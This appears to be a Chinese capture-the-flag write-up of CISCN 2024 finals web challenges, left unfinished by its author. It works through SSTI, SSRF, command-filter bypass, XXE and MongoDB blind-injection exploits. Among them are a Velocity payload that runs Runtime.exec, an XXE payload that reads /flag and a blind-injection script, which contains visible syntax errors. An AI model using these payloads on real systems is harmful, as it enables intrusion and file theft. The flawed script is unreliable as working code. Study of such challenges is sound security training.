2024 ciscn各赛区决赛复现(未完)
感谢很多师傅 拿到了很多赛区的附件 还好是awdp 能拿到附件
西南赛区
ezssti
data:image/s3,"s3://crabby-images/cf099/cf099f57660e5b35165530704f6eb7c57f7c97b3" alt="image-20240704182013615"
存在Velocity模板注入,day month 可以控制
注意到mouth存在简单的waf
data:image/s3,"s3://crabby-images/71c01/71c01ef2c3c4a75f0af88993115c3cd2177ca624" alt="image-20240704184423105"
判断是否为空如果不为空,直接使用Integer.parseInt进行强制类型转换 转换成数字
注意到 day参数没有waf 直接打就行
data:image/s3,"s3://crabby-images/3b453/3b453a0d9ffec37c8db39ebfeda7233301557f8a" alt="image-20240704184209018"
1 2
| #set($e="e") $e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")
|
flaskweb
存在ssti注入
data:image/s3,"s3://crabby-images/6a400/6a40029a07c6361410e0065ca898b1dab37d13fc" alt="image-20240704192900724"
注意到加入的路径 aes解密一次之后直接渲染
aes密钥已经给出
data:image/s3,"s3://crabby-images/4b74a/4b74a9aec1751e1235678a3b4cc6a6e21f41f7ed" alt="image-20240704193139200"
直接一把梭就行
data:image/s3,"s3://crabby-images/65ca0/65ca0c1b0faa442a8bb4ffbc83cbfe2cc020a231" alt="image-20240704193243863"
添加路劲即可rce
data:image/s3,"s3://crabby-images/310a7/310a719d80abbb19da096db9f88ff43ccd51c261" alt=""
ssrf2rce
满足正则就行
1
| http://ciscn.asa?@127.0.0.1/flag.php/look
|
得到lag.php出来 能看到存在如下文件
data:image/s3,"s3://crabby-images/980a2/980a2d8ed5c9257f408c57235bce0ac98592d3bd" alt="image-20240704193549731"
访问 源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| <?php function executeComand($command) { if (preg_match('/cat| |\\\\|\${IFS}|%09|\$[*@x]|tac|bat|more|less|nl|od|sed|awk|perl|python|ruby|xxd|hexdump|string/', $command)) { return "Hacker!!!"; }
$output = shell_exec($command); if ($output === null) { return "uhhhh"; }
return $output; }
$command = isset($_GET['command']) ? $_GET['command'] : '';
if (!empty($command)) { $result = executeCommand($command); echo nl2br(htmlspecialchars($result, ENT_QUOTES, 'UTF-8')); } else { echo highlight_file(__FILE__, true); } ?>
|
直接给了rce 但是需要过滤了很多,同时shell_exec 是没有回显的命令执行点
可以使用l\s | tee 1 把flag文件名字写入1文件中 然后使用ca\t /flag | tee2 实现文件写入读取
主要是空格被过滤了很麻烦
可以使用<>代替空格,$IFS也行
zwphpc
存在back.rar 里面是源码
查看recode.php 注意到
data:image/s3,"s3://crabby-images/4b195/4b195cb8bbc2a2c0fa20820a69fa555349a5449d" alt="image-20240704200408617"
可以根据hostname ip port 将相关的xml文件写入
注意到在search.php里面存在xxe
data:image/s3,"s3://crabby-images/eca64/eca648c0ff6c0b081910a5721294cc58d7b0a230" alt="image-20240704200512165"
写一个恶意的xml文件进去 然后造成xxe即可
1
| <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///flag">]><host><hostname>&xxe;</hostname><ip>254.131.25.69</ip><port>10086</port></host>
|
weblog
存在sql注入
data:image/s3,"s3://crabby-images/5e58b/5e58b1f62130e87e762c715e453742f902fb7c06" alt="image-20240704201426906"
这里存在sprintf函数 查查
1 2 3
| sprintf() 函数把格式化的字符串写入变量中。
arg1、arg2、++ 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。
|
这里没有预处理 可以直接注入
注意到有一个这样的文件
data:image/s3,"s3://crabby-images/65084/65084dbdbe8970f0c86ff102d12cd8f4b60250f4" alt="image-20240704201907734"
这里可以直接控制host username password 啥的 可以fakeMySQL load data读取任意文件
华南赛区
只要到了题 拿附件名字做
ezjava
初赛差不多的题目 打sqlite jdbc rce即可
看到别的师傅的吐槽 可以直接fakemysql loaddata读取flag
archive-php
直接先工具跑一下各种危险函数
data:image/s3,"s3://crabby-images/65608/656080df7f76599504dd5d4c215708fd93918c50" alt="image-20240706092942053"
存在一个直接的后门
data:image/s3,"s3://crabby-images/7cc6d/7cc6d14db92f638f62934224da6833ae1abf46a4" alt="image-20240706094021560"
审计路由
看到一个类似xxe的 可惜禁止了外部实体
data:image/s3,"s3://crabby-images/0f3d2/0f3d2d4689cdc48ea1492059daf79b4fd4a40fcb" alt="image-20240706100746370"
其他也没看出啥 路由写的看不懂 回头花点时间搞一下
华中赛区
华中赛区的题目都挺难的
ezjava
看登录的逻辑
data:image/s3,"s3://crabby-images/e4d50/e4d508f17a196acab63a2b59fc17db0778fb76d0" alt="image-20240707152104163"
主要就是获取到账号密码 然后进入查询 如果密码符合 就获取flag
注意到后端使用的是mongodb
盲注即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| import requests import urllib3 import string import urllib urllib3.disable_warnings() username="admin" password="" target = 'http://127.0.0.1:8080/login' headers = {'content-type': 'application/json'} while True: for c in string.printable: if c not in ['*','+','.','?','|']: payload = '{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) r = requests.post(target, data = payload, headers = headers) if "username or password incorrect" in r.text print("" % (password+c)) password += cs
|
aj-report
题目有点难 后面就没细看了